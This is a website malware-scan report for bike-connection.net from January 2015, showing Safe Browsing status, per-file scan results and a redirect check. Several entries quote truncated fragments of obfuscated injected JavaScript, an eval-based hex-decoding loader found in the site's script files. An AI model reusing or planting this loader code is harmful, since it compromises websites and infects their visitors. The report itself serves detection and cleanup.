Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bike-connection.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bike-connection.net/ | 200 OK Content-Length: 57596 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0','width','662','height','400','src','touren_2008_images/ausgabe_europa','quality','high','pluginspage','http://www.macromedia.com/go/getflashplayer','wmode','transparent','movie','touren_2008_images/ausgabe_europa?var2008= <script type="text/javascript" language="javascript" > ylr="y";vlmlmf="d"+"o"+"c"+"ument";try{+function(){if(document.qu ...[3545 bytes skipped]... Antivirus reports:
| ||
http://bike-connection.net/copytoclipboard.js | 404 Not Found Content-Length: 216 Content-Type: text/html | clean |
http://bike-connection.net/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://bike-connection.net/./Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8109 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) hyjc="y";bffqn="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[bffqn].body)==null}()}catch(ggei){suds=function(mduf){mduf="fr"+"omCh"+mduf;for(mif=0;mif<hyjc.length;mif++){jee+=String[mduf](mtud(udmv+(hyjc[mif]))-(91));}};};mtud=(window.eval);udmv="0x";rrd=0;try{;}catch(sqw){rrd=1}if(!rrd){try{++mtud(bffqn)["\x62o"+"d"+hyjc]}catch(ggei){mhsgr="^";}hyjc="7b^c1^d0^c9^be^cf^c4^ca^c9^7b^d4^bc^8b^94^83^84^7b^d6^68^65^7b^d1^bc^cd^7b^ce^cf^bc^cf^c4^be^98^82^bc^c5^bc^d3^82^96^ Antivirus reports:
| ||
http://bike-connection.net/./_jsc/ddlevelsmenu.js | 200 OK Content-Length: 20465 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) hyjc="y";bffqn="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[bffqn].body)==null}()}catch(ggei){suds=function(mduf){mduf="fr"+"omCh"+mduf;for(mif=0;mif<hyjc.length;mif++){jee+=String[mduf](mtud(udmv+(hyjc[mif]))-(91));}};};mtud=(window.eval);udmv="0x";rrd=0;try{;}catch(sqw){rrd=1}if(!rrd){try{++mtud(bffqn)["\x62o"+"d"+hyjc]}catch(ggei){mhsgr="^";}hyjc="7b^c1^d0^c9^be^cf^c4^ca^c9^7b^d4^bc^8b^94^83^84^7b^d6^68^65^7b^d1^bc^cd^7b^ce^cf^bc^cf^c4^be^98^82^bc^c5^bc^d3^82^96^ Antivirus reports:
| ||
http://bike-connection.net/tooltip.js | 200 OK Content-Length: 487 Content-Type: application/x-javascript | clean |
http://bike-connection.net/ticker.js.php | 200 OK Content-Length: 4877 Content-Type: text/html | clean |
http://bike-connection.net/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8109 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) hyjc="y";bffqn="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[bffqn].body)==null}()}catch(ggei){suds=function(mduf){mduf="fr"+"omCh"+mduf;for(mif=0;mif<hyjc.length;mif++){jee+=String[mduf](mtud(udmv+(hyjc[mif]))-(91));}};};mtud=(window.eval);udmv="0x";rrd=0;try{;}catch(sqw){rrd=1}if(!rrd){try{++mtud(bffqn)["\x62o"+"d"+hyjc]}catch(ggei){mhsgr="^";}hyjc="7b^c1^d0^c9^be^cf^c4^ca^c9^7b^d4^bc^8b^94^83^84^7b^d6^68^65^7b^d1^bc^cd^7b^ce^cf^bc^cf^c4^be^98^82^bc^c5^bc^d3^82^96^ Antivirus reports:
| ||
http://bike-connection.net/contentslider.js | 200 OK Content-Length: 7733 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bike-connection.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 10 Jan 2015 02:29:26 GMT
Pragma: no-cache
Server: nginx/1.2.1
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9edc9a1a6a99acef182b5552b69005e0; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: bike-connection.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 10 Jan 2015 02:29:26 GMT
Pragma: no-cache
Server: nginx/1.2.1
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9edc9a1a6a99acef182b5552b69005e0; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: bike-connection.net
Referer: http://www.google.com/search?q=bike-connection.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bike-connection.net
Referer: http://www.google.com/search?q=bike-connection.net
Result:
The result is similar to the first query. There are no suspicious redirects found.